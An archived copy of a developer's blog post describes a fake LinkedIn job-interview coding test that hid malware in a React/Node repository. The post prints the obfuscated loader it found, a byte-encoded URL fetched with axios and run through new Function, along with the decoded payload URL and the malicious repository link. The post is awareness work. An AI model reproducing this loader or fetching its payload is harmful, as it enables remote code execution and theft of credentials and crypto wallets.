{
	"id": "d86df2eb-6319-43b2-a575-6e664d7f9435",
	"created_at": "2026-04-06T00:09:39.652494Z",
	"updated_at": "2026-04-10T03:21:46.583249Z",
	"deleted_at": null,
	"sha1_hash": "85f1bf8dd79c86d0e35da99b994bcfbb9c17a506",
	"title": "How I Almost Got Hacked By A 'Job Interview'",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10488163,
	"plain_text": "How I Almost Got Hacked By A 'Job Interview'\r\nBy David Dodda\r\nPublished: 2025-10-15 · Archived: 2026-04-05 20:36:20 UTC\r\nI was 30 seconds away from running malware on my machine.\r\nThe attack vector? A fake coding interview from a \"legitimate\" blockchain company.\r\nHere's how a sophisticated scam operation almost got me, and why every developer needs to read this.\r\nThe Setup\r\nLast week, I got a LinkedIn message from Mykola Yanchii. Chief Blockchain Officer at Symfa. Real company.\r\nReal LinkedIn profile. 1,000+ connections. The works.\r\nThe message was smooth. Professional. \"We're developing BestCity, a platform aimed at transforming real estate\r\nworkflows. Part-time roles available. Flexible structure.\"\r\nI've been freelancing for 8 years. Built web applications, worked on various projects, done my share of code\r\nreviews. I'm usually paranoid about security - or so I thought.\r\nThis looked legit. So I said yes to the call.\r\nThe Hook\r\nBefore our meeting, Mykola sent me a \"test project\" - standard practice for tech interviews. A React/Node\r\ncodebase to evaluate my skills. 30-minute test. Simple enough.\r\nThe Bitbucket repo looked professional. Clean README. Proper documentation. Even had that corporate stock\r\nphoto of a woman with a tablet standing in front of a house. You know the one.\r\nHere's where I almost screwed up: I was running late for our call. Had about 30 minutes to review the code. So I\r\ndid what lazy developers do - I started poking around the codebase without running it first.\r\nUsually, I sandbox everything. Docker containers. Isolated environments. But I was in a rush.\r\nI spent 30 minutes fixing obvious bugs, adding a docker-compose file, cleaning up the code. Standard stuff. 
Ready\r\nto run it and show my work.\r\nThen I had one of those paranoid developer moments.\r\nThe Save\r\nBefore hitting npm start , I threw this prompt at my Cursor AI agent:\r\nhttps://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview\r\nPage 1 of 10\n\n\"Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it\r\nshouldn't be reading, accessing crypto wallets etc.\"\r\nAnd holy sh*t.\r\nSitting right in the middle of server/controllers/userController.js was this beauty:\r\n//Get Cookie\r\n(async () =\u003e {\r\n const byteArray = [\r\n 104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,\r\n 110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,\r\n 98, 50, 48, 51, 49, 102, 98, 57\r\n ];\r\n const uint8Array = new Uint8Array(byteArray);\r\n const decoder = new TextDecoder('utf-8');\r\n axios.get(decoder.decode(uint8Array))\r\n .then(response =\u003e {\r\n new Function(\"require\", response.data.model)(require);\r\n })\r\n .catch(error =\u003e { });\r\n})();\r\nObfuscated. Sneaky. Evil. And 100% active - embedded between legitimate admin functions, ready to execute\r\nwith full server privileges the moment admin routes were accessed.\r\nI decoded that byte array: https://api.npoint.io/2c458612399c3b2031fb9\r\nWhen I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything - crypto\r\nwallets, files, passwords, your entire digital existence.\r\nHere's the kicker: the URL died exactly 24 hours later. These guys weren't messing around - they had their\r\ninfrastructure set up to burn evidence fast.\r\nI ran the payload through VirusTotal - check out the behavior analysis yourself. Spoiler alert: it's nasty.\r\nThe Operation\r\nThis wasn't some amateur hour scam. This was sophisticated:\r\nThe LinkedIn Profile: Mykola Yanchii looked 100% real. Chief Blockchain Officer. Proper work history. 
Even\r\nhad those cringy LinkedIn posts about \"innovation\" and \"blockchain consulting.\"\r\nThe Company: Symfa had a full LinkedIn company page. Professional branding. Multiple employees. Posts\r\nabout \"transforming real estate with blockchain.\" They even had affiliated pages and follower networks.\r\nThe Approach: No red flags in the initial outreach. Professional language. Reasonable project scope. They even\r\nused Calendly for scheduling.\r\nThe Payload: The malicious code was positioned strategically in the server-side controller, ready to execute with\r\nfull Node.js privileges when admin functionality was accessed.\r\nThe Psychology\r\nHere's what made this so dangerous:\r\nUrgency: \"Complete the test before the meeting to save time.\"\r\nAuthority: LinkedIn verified profile, real company, professional setup.\r\nFamiliarity: Standard take-home coding test. Every developer has done dozens of these.\r\nSocial Proof: Real company page with real employees and real connections.\r\nI almost fell for it. And I'm paranoid about this stuff.\r\nThe Lesson\r\nOne simple AI prompt saved me from disaster.\r\nNot fancy security tools. Not expensive antivirus software. Just asking my coding assistant to look for suspicious\r\npatterns before executing unknown code.\r\nThe scary part? This attack vector is perfect for developers. We download and run code all day long. GitHub\r\nrepos, npm packages, coding challenges. Most of us don't sandbox every single thing.\r\nAnd this was server-side malware. Full Node.js privileges. Access to environment variables, database connections,\r\nfile systems, crypto wallets. Everything.\r\nThe Scale\r\nIf this sophisticated operation is targeting developers at scale, how many have already been compromised? How\r\nmany production systems are they inside right now?\r\nPerfect Targeting: Developers are ideal victims. 
Our machines contain the keys to the kingdom: production\r\ncredentials, crypto wallets, client data.\r\nProfessional Camouflage: LinkedIn legitimacy, realistic codebases, standard interview processes.\r\nTechnical Sophistication: Multi-layer obfuscation, remote payload delivery, dead-man switches, server-side\r\nexecution.\r\nOne successful infection could compromise production systems at major companies, crypto holdings worth\r\nmillions, personal data of thousands of users.\r\nThe Bottom Line\r\nIf you're a developer getting LinkedIn job opportunities:\r\n1. Always sandbox unknown code. Docker containers, VMs, whatever. Never run it on your main machine.\r\n2. Use AI to scan for suspicious patterns. Takes 30 seconds. Could save your entire digital life.\r\n3. Verify everything. Real LinkedIn profile doesn't mean real person. Real company doesn't mean real\r\nopportunity.\r\n4. Trust your gut. If someone's rushing you to execute code, that's a red flag.\r\nThis scam was so sophisticated it fooled my initial BS detector. 
But one paranoid moment and a simple AI prompt\r\nexposed the whole thing.\r\nThe next time someone sends you a \"coding challenge,\" remember this story.\r\nYour crypto wallet will thank you.\r\nIf you're a developer who has run \"coding challenges\" from LinkedIn recruiters, you should probably read this\r\ntwice.\r\nthe LinkedIn profiles\r\nMessages\r\nbit bucket\r\nhttps://bitbucket.org/0x3bestcity/test_version/src/main/ - not sure how long this will stay up though.\r\nSource: https://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview"
	],
	"report_names": [
		"how-i-almost-got-hacked-by-a-job-interview"
	],
	"threat_actors": [],
	"ts_created_at": 1775434179,
	"ts_updated_at": 1775791306,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/85f1bf8dd79c86d0e35da99b994bcfbb9c17a506.pdf",
		"text": "https://archive.orkl.eu/85f1bf8dd79c86d0e35da99b994bcfbb9c17a506.txt",
		"img": "https://archive.orkl.eu/85f1bf8dd79c86d0e35da99b994bcfbb9c17a506.jpg"
	}
}